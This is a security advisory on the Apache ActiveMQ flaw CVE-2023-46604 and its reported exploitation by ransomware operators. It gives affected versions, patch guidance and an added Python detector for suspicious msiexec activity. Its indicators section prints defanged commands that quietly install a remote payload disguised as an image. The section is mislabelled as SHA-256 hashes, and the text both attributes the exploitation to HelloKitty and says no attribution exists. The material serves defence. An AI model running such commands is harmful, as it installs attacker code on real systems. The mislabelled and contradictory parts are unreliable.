Indiscriminate, opportunistic targeting.
Intelligence indicates that a recently disclosed Apache ActiveMQ vulnerability, tracked as CVE-2023-46604 (CVSSv3.1 score: 10.0), has been exploited by HelloKitty ransomware operators. The assessment has been made based on the contents of the ransom note and the technical analysis of the associated malware source code.
On 2nd November 2023, CVE-2023-46604 was added to the Cybersecurity & Infrastructure Security Agency (CISA) Known Exploited Vulnerability (KEV) Catalog.
It has been assessed that successful exploitation of CVE-2023-46604 would almost certainly result in threat actors gaining remote code execution capabilities on target systems.
Apache has released a security update for the affected product versions; releases prior to the fixed versions remain vulnerable to exploitation.
CVE-2023-46604 affects the following Apache ActiveMQ versions:
Apache ActiveMQ 5.18.0 before 5.18.3
Apache ActiveMQ 5.17.0 before 5.17.6
Apache ActiveMQ 5.16.0 before 5.16.7
Apache ActiveMQ before 5.15.16
Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16
Containment, Mitigations & Remediations
It is strongly recommended that users of the affected product versions apply the released Apache security update. The fix is included in ActiveMQ versions 5.15.16, 5.16.7, 5.17.6 and 5.18.3, released late last month.
Indicators of Compromise
File Hash Indicators (SHA-256):
cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png"
cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m2.png"
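The following is an added defender-side example, not code from the advisory: it classifies an installed ActiveMQ version against the affected ranges listed above and flags process-creation log lines that match the shape of the command-line indicators (msiexec quietly installing a remote file disguised with a non-.msi extension). The log lines and the 192.0.2.10 address are constructed samples, not real telemetry or indicators.

```python
import re

# (lower inclusive, upper exclusive) bounds taken from the advisory's affected-version list.
AFFECTED_RANGES = [
    ((5, 18, 0), (5, 18, 3)),
    ((5, 17, 0), (5, 17, 6)),
    ((5, 16, 0), (5, 16, 7)),
    ((0, 0, 0), (5, 15, 16)),   # everything before 5.15.16
]


def parse_version(text):
    """Turn '5.17.2' (a trailing suffix such as '-SNAPSHOT' is ignored) into a tuple."""
    m = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised ActiveMQ version string: {text!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(version_text):
    """True when the broker version falls inside any CVE-2023-46604 affected range."""
    v = parse_version(version_text)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


# msiexec with an /i (install) argument that is a remote URL; switches may precede /i.
MSIEXEC_REMOTE = re.compile(
    r"msiexec(?:\.exe)?\s+(?:/\w+\s+)*/i\s+(https?://\S+)", re.IGNORECASE
)


def suspicious_msiexec(cmdline):
    """Flag a quiet remote msiexec install whose target does not even claim to be an .msi,
    mirroring the image-named payloads in the indicators above (a constructed heuristic)."""
    m = MSIEXEC_REMOTE.search(cmdline)
    if not m:
        return False
    return not m.group(1).lower().rstrip('"\'').endswith(".msi")


# Constructed sample command lines, e.g. from a process-creation (Sysmon EID 1 / 4688) feed.
SAMPLE_LINES = [
    'cmd.exe /c "start msiexec /q /i http://192.0.2.10/m4.png"',      # same shape as the IoCs
    'msiexec /i C:\\Installers\\agent.msi /quiet',                     # local, benign
    'cmd.exe /c "start msiexec /q /i http://192.0.2.10/update.msi"',  # remote but claims .msi
]


def scan(lines):
    """Return the subset of lines that match the suspicious msiexec pattern."""
    return [line for line in lines if suspicious_msiexec(line)]
```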
Apache ActiveMQ occupies a significant portion of the enterprise application integration market share. The related products are used extensively by organisations across the industry sector spectrum. Within this context, it has been assessed that cyber threat actors will almost certainly view organisations with operational protocols involving these products as prime targets as they seek to meet their pre-defined objectives.
Due to CVE-2023-46604 having already been subjected to malicious cyber operations, it is of critical importance to follow the recommended remediation strategies to reduce the risk of exploitation.
No attribution to specific threat actors or groups has been identified at the time of writing.
Common Weakness Enumeration (CWE):
CWE-502: Deserialization of Untrusted Data